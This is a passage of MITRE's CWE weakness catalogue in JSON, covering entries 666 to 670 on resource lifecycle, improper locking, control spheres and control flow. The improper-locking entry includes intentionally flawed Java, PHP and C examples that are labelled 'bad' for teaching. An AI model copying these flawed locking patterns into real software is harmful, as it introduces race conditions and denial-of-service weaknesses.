Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Observed_Examples"}],"Previous_Entry_Name":{"#text":"Incorrect or Incomplete Initialization","attr":{"@_Date":"2009-01-12"}}}},"666":{"attr":{"@_ID":"666","@_Name":"Operation on Resource in Wrong Phase of Lifetime","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software performs an operation on a resource at the wrong phase of the resource\'s lifecycle, which can lead to unexpected behaviors.","Extended_Description":"When a developer wants to initialize, use or release a resource, it is important to follow the specifications outlined for how to operate on that resource and to ensure that the resource is in the expected state. In this case, the software wants to perform a normally valid operation, initialization, use or release, on a resource when it is in the incorrect phase of its lifetime.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"664","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Other"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"Follow the resource\'s lifecycle from creation to release."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO46-C","Entry_Name":"Do not access a closed file","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MEM30-C","Entry_Name":"Do not access freed memory","Mapping_Fit":"CWE More Abstract"}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-04-11"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships, Time_of_Introduction"}]}},"667":{"attr":{"@_ID":"667","@_Name":"Improper Locking","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not properly acquire or release a lock on a resource, leading to unexpected resource state changes and behaviors.","Extended_Description":{"xhtml:p":"Locking is a type of synchronization behavior that ensures that multiple independently-operating processes or threads do not interfere with each other when accessing the same resource. All processes/threads are expected to follow the same steps for locking. If these steps are not followed precisely - or if no locking is done at all - then another process/thread could modify the shared resource in a way that is not visible or predictable to the original process.  This can lead to data or memory corruption, denial of service, etc."},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"662","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"662","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"662","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"662","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":"DoS: Resource Consumption (CPU)","Note":"Inconsistent locking discipline can lead to deadlock."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Strategy":"Libraries or Frameworks","Description":"Use industry standard APIs to implement locking mechanism."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"In the following Java snippet, methods are defined to get and set a long field in an instance of a class that is shared across multiple threads. Because operations on double and long are nonatomic in Java, concurrent access may cause unexpected behavior. Thus, all operations on long and double fields should be synchronized.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"private long someLongValue;public long getLongValue() {}public void setLongValue(long l) {}","xhtml:br":["","",""],"xhtml:div":[{"#text":"return someLongValue;","attr":{"@_style":"margin-left:10px;"}},{"#text":"someLongValue = l;","attr":{"@_style":"margin-left:10px;"}}]}}},{"attr":{"@_Demonstrative_Example_ID":"DX-69"},"Intro_Text":"This code tries to obtain a lock for a file, then writes to it.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"function writeToLog($message){}fclose($logFile);","xhtml:div":{"#text":"$logfile = fopen(\\"logFile.log\\", \\"a\\");if (flock($logfile, LOCK_EX)) {}else {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""],"xhtml:i":"//attempt to get logfile lock","xhtml:div":[{"#text":"fwrite($logfile,$message);flock($logfile, LOCK_UN);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""],"xhtml:i":"// unlock logfile"},{"#text":"print \\"Could not obtain lock on logFile.log, message not recorded\\\\n\\";","attr":{"@_style":"margin-left:10px;"}}]},"xhtml:br":""}},"Body_Text":"PHP by default will wait indefinitely until a file lock is released. If an attacker is able to obtain the file lock, this code will pause execution, possibly leading to denial of service for other users. Note that in this case, if an attacker can perform an flock() on the file, they may already have privileges to destroy the log file. However, this still impacts the execution of other programs that depend on flock()."},{"attr":{"@_Demonstrative_Example_ID":"DX-24"},"Intro_Text":"The following function attempts to acquire a lock in order to perform operations on a shared resource.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"void f(pthread_mutex_t *mutex) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"pthread_mutex_lock(mutex);pthread_mutex_unlock(mutex);","xhtml:br":["","","","",""],"xhtml:i":"/* access shared resource */"}}}},{"attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"int f(pthread_mutex_t *mutex) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int result;result = pthread_mutex_lock(mutex);if (0 != result)return pthread_mutex_unlock(mutex);","xhtml:br":["","","","","","","",""],"xhtml:div":{"#text":"return result;","attr":{"@_style":"margin-left:10px;"}},"xhtml:i":"/* access shared resource */"}}}}],"Body_Text":["However, the code does not check the value returned by pthread_mutex_lock() for errors. If pthread_mutex_lock() cannot acquire the mutex for any reason, the function may introduce a race condition into the program and result in undefined behavior.","In order to avoid data races, correctly written programs must check the result of thread synchronization functions and appropriately handle all errors, either by attempting to recover from them or reporting them to higher levels."]},{"attr":{"@_Demonstrative_Example_ID":"DX-70"},"Intro_Text":"It may seem that the following bit of code achieves thread safety while avoiding unnecessary synchronization...","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"if (helper == null) {}return helper;","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"synchronized (this) {}","xhtml:div":{"#text":"if (helper == null) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"helper = new Helper();","attr":{"@_style":"margin-left:10px;"}}}}},"xhtml:br":""}},{"attr":{"@_Nature":"bad"},"xhtml:div":"helper = new Helper();"}],"Body_Text":["The programmer wants to guarantee that only one Helper() object is ever allocated, but does not want to pay the cost of synchronization every time this code is called.","Suppose that helper is not initialized. Then, thread A sees that helper==null and enters the synchronized block and begins to execute:","If a second thread, thread B, takes over in the middle of this call and helper has not finished running the constructor, then thread B may make calls on helper while its fields hold incorrect values."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2009-0935","Description":"Attacker provides invalid address to a memory-reading function, causing a mutex to be unlocked twice","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0935"},{"Reference":"CVE-2010-4210","Description":"function in OS kernel unlocks a mutex that was not previously locked, causing a panic or overwrite of arbitrary memory.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4210"},{"Reference":"CVE-2008-4302","Description":"Chain: OS kernel does not properly handle a failure of a function call (CWE-755), leading to an unlock of a resource that was not locked (CWE-832), with resultant crash.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4302"},{"Reference":"CVE-2009-1243","Description":"OS kernel performs an unlock in some incorrect circumstances, leading to panic.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1243"},{"Reference":"CVE-2009-2857","Description":"OS deadlock","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2857"},{"Reference":"CVE-2009-1961","Description":"OS deadlock involving 3 separate functions","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1961"},{"Reference":"CVE-2009-2699","Description":"deadlock in library","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2699"},{"Reference":"CVE-2009-4272","Description":"deadlock triggered by packets that force collisions in a routing table","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4272"},{"Reference":"CVE-2002-1850","Description":"read/write deadlock between web server and script","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1850"},{"Reference":"CVE-2004-0174","Description":"web server deadlock involving multiple listening connections","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0174"},{"Reference":"CVE-2009-1388","Description":"multiple simultaneous calls to the same function trigger deadlock.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1388"},{"Reference":"CVE-2006-5158","Description":"chain: other weakness leads to NULL pointer dereference (CWE-476) or deadlock (CWE-833).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5158"},{"Reference":"CVE-2006-4342","Description":"deadlock when an operation is performed on a resource while it is being removed.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4342"},{"Reference":"CVE-2006-2374","Description":"Deadlock in device driver triggered by using file handle of a related device.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2374"},{"Reference":"CVE-2006-2275","Description":"Deadlock when large number of small messages cannot be processed quickly enough.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2275"},{"Reference":"CVE-2005-3847","Description":"OS kernel has deadlock triggered by a signal during a core dump.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3847"},{"Reference":"CVE-2005-3106","Description":"Race condition leads to deadlock.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3106"},{"Reference":"CVE-2005-2456","Description":"Chain: array index error (CWE-129) leads to deadlock (CWE-833)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2456"},{"Reference":"CVE-2001-0682","Description":"Program can not execute when attacker obtains a mutex.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0682"},{"Reference":"CVE-2002-1914","Description":"Program can not execute when attacker obtains a lock on a critical output file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1914"},{"Reference":"CVE-2002-1915","Description":"Program can not execute when attacker obtains a lock on a critical output file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1915"},{"Reference":"CVE-2002-0051","Description":"Critical file can be opened with exclusive read access by user, preventing application of security policy. Possibly related to improper permissions, large-window race condition.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0051"},{"Reference":"CVE-2000-0338","Description":"Chain: predictable file names used for locking, allowing attacker to create the lock beforehand. Resultant from permissions and randomness.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0338"},{"Reference":"CVE-2000-1198","Description":"Chain: Lock files with predictable names. Resultant from randomness.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1198"},{"Reference":"CVE-2002-1869","Description":"Product does not check if it can write to a log file, allowing attackers to avoid logging by accessing the file using an exclusive lock. Overlaps unchecked error condition. This is not quite CWE-412, but close.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1869"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"CON31-C","Entry_Name":"Do not destroy a mutex while it is locked","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"POS48-C","Entry_Name":"Do not unlock or destroy another POSIX thread\'s mutex","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"VNA00-J","Entry_Name":"Ensure visibility when accessing shared primitive variables"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"VNA02-J","Entry_Name":"Ensure that compound operations on shared variables are atomic"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"VNA05-J","Entry_Name":"Ensure atomicity when reading and writing 64-bit values"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"LCK06-J","Entry_Name":"Do not use an instance lock to protect shared static data"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP19","Entry_Name":"Missing Lock"},{"attr":{"@_Taxonomy_Name":"OMG ASCSM"},"Entry_ID":"ASCSM-CWE-667"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"25"}},{"attr":{"@_CAPEC_ID":"26"}},{"attr":{"@_CAPEC_ID":"27"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-962","@_Section":"ASCSM-CWE-667"}}},"Notes":{"Note":{"#text":"Deeper research is necessary for synchronization and related mechanisms, including locks, mutexes, semaphores, and other mechanisms. Multiple entries are dependent on this research, which includes relationships to concurrency, race conditions, reentrant functions, etc.  CWE-662 and its children - including CWE-667, CWE-820, CWE-821, and others - may need to be modified significantly, along with their relationships.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-04-11"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Description, Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-23","Modification_Comment":"updated Description, Maintenance_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}],"Previous_Entry_Name":{"#text":"Insufficient Locking","attr":{"@_Date":"2010-12-13"}}}},"668":{"attr":{"@_ID":"668","@_Name":"Exposure of Resource to Wrong Sphere","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product exposes a resource to the wrong control sphere, providing unintended actors with inappropriate access to the resource.","Extended_Description":{"xhtml:p":["Resources such as files and directories may be inadvertently exposed through mechanisms such as insecure permissions, or when a program accidentally operates on the wrong object. For example, a program may intend that private files can only be provided to a specific user. This effectively defines a control sphere that is intended to prevent attackers from accessing these private files. If the file permissions are insecure, then parties other than the user will be able to access those files.","A separate control sphere might effectively require that the user can only access the private files, but not any other files on the system. If the program does not ensure that the user is only requesting private files, then the user might be able to access other files on the system.","In either case, the end result is that a resource has been exposed to the wrong party."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"664","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Other"],"Impact":["Read Application Data","Modify Application Data","Other"]}},"Notes":{"Note":{"#text":"A \\"control sphere\\" is a set of resources and behaviors that are accessible to a single actor, or a group of actors. A product\'s security model will typically define multiple spheres, possibly implicitly. For example, a server might define one sphere for \\"administrators\\" who can create new user accounts with subdirectories under /home/server/, and a second sphere might cover the set of users who can create or delete files within their own subdirectories. A third sphere might be \\"users who are authenticated to the operating system on which the product is installed.\\" Each sphere has different sets of actors and allowable behaviors.","attr":{"@_Type":"Theoretical"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-04-11"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-22","Modification_Importance":"Critical","Modification_Comment":"Clarified description to include permissions."},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Other_Notes, Theoretical_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships, Relevant_Properties"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Relationships"}]}},"669":{"attr":{"@_ID":"669","@_Name":"Incorrect Resource Transfer Between Spheres","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product does not properly transfer a resource/behavior to another sphere, or improperly imports a resource/behavior from another sphere, in a manner that provides unintended control over that resource.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"664","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Background_Details":{"Background_Detail":"A \\"control sphere\\" is a set of resources and behaviors that are accessible to a single actor, or a group of actors. A product\'s security model will typically define multiple spheres, possibly implicitly. For example, a server might define one sphere for \\"administrators\\" who can create new user accounts with subdirectories under /home/server/, and a second sphere might cover the set of users who can create or delete files within their own subdirectories. A third sphere might be \\"users who are authenticated to the operating system on which the product is installed.\\" Each sphere has different sets of actors and allowable behaviors."},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Application Data","Modify Application Data","Unexpected State"]}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-04-11"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Background_Details, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships, Relevant_Properties"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"670":{"attr":{"@_ID":"670","@_Name":"Always-Incorrect Control Flow Implementation","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The code contains a control flow path that does not reflect the algorithm that the path is intended to implement, leading to incorrect behavior any time this path is navigated.","Extended_Description":"This weakness captures cases in which a particular code segment is always incorrect with respect to the algorithm that it is implementing. For example, if a C programmer intends to include multiple statements in a single block but does not include the enclosing braces (CWE-483), then the logic is always incorrect. This issue is in contrast to most weaknesses in which the code usually behaves correctly, except when it is externally manipulated in malicious ways.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"691","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"This issue typically appears in rarely-tested code, since the \\"always-incorrect\\" nature will be detected as a bug during normal usage."}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":["Other","Alter Execution Logic"]}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2021-3011","Description":"virtual interrupt controller in a virtualization product allows crash of host by writing a certain invalid value to a register, which triggers a fatal error instead of returning an error code","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3011"}},"Notes":{"Note":{"#text":"This node could possibly be split into lower-level nodes. \\"Early Return\\" is for returning control to the caller too soon (e.g., CWE-584). \\"Excess Return\\" is when control is returned too far up the call stack (CWE-600, CWE-395). \\"Improper control limitation\\" occurs when the product maintains control at a lower level of execution, when control should be returned \\"further\\" up the call stack (CWE-455). \\"Incorrect syntax\\" covers code that\'s \\"just plain wrong\\" such as CWE-484 and CWE-483.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-04-11"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Maintenance_Notes, Modes_of_Introduction, Other_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content 